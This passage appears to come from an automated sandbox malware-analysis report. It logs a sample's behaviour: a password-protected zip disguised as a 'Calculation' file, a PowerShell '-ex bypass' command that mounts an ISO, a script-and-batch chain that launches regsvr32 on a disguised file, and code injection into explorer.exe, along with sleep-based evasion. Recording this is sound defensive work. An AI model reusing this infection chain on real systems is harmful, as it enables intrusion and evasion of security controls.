          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6656Thread sleep count: 57 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6944Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep count: 8543 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4408Thread sleep count: 115 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3416Thread sleep count: 4271 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_29-13005
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8543Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4271Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_29-11352
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 9_2_00CFB29A GetSystemInfo,9_2_00CFB29A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EC134 FindFirstFileW,FindNextFileW,29_2_032EC134
          Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMNetworkAdapterExtendedAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterTeamMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Connect-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VMNetworkAdapterExtendedAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterTeamMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterIsolation
          Source: ModuleAnalysisCache.15.drBinary or memory string: Test-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
          Source: ModuleAnalysisCache.15.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterRdma
          Source: ModuleAnalysisCache.15.drBinary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMNetworkAdapterTeamMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
          Source: ModuleAnalysisCache.15.drBinary or memory string: Rename-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterVlan
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterIsolation
          Source: ModuleAnalysisCache.15.drBinary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: "Remove-VMNetworkAdapterTeamMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMNetworkAdapterAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VMScsiController
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VmNetworkAdapterIsolation
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMScsiController
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterRdma
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterVlan
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VmNetworkAdapterIsolation
          Source: ModuleAnalysisCache.15.drBinary or memory string: Disconnect-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: "Remove-VMNetworkAdapterExtendedAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
          Source: ModuleAnalysisCache.15.drBinary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VMNetworkAdapterAcl
          Source: ModuleAnalysisCache.15.drBinary or memory string: Set-VMNetworkAdapterFailoverConfiguration
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMScsiController
          Source: ModuleAnalysisCache.15.drBinary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
          Source: ModuleAnalysisCache.15.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterFailoverConfiguration
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMNetworkAdapter
          Source: ModuleAnalysisCache.15.drBinary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
          Source: ModuleAnalysisCache.15.drBinary or memory string: Get-VMNetworkAdapterExtendedAcl
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EEFB8 LoadLibraryA,GetProcAddress,29_2_032EEFB8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 32D0000 value: B8Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 30042D8 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 30051E8 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 3310000 value: 9CJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 712 base: 93F380 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zipJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.isoJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 more/veryAs.dbJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeQueries volume information: \Device\CdRom1\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
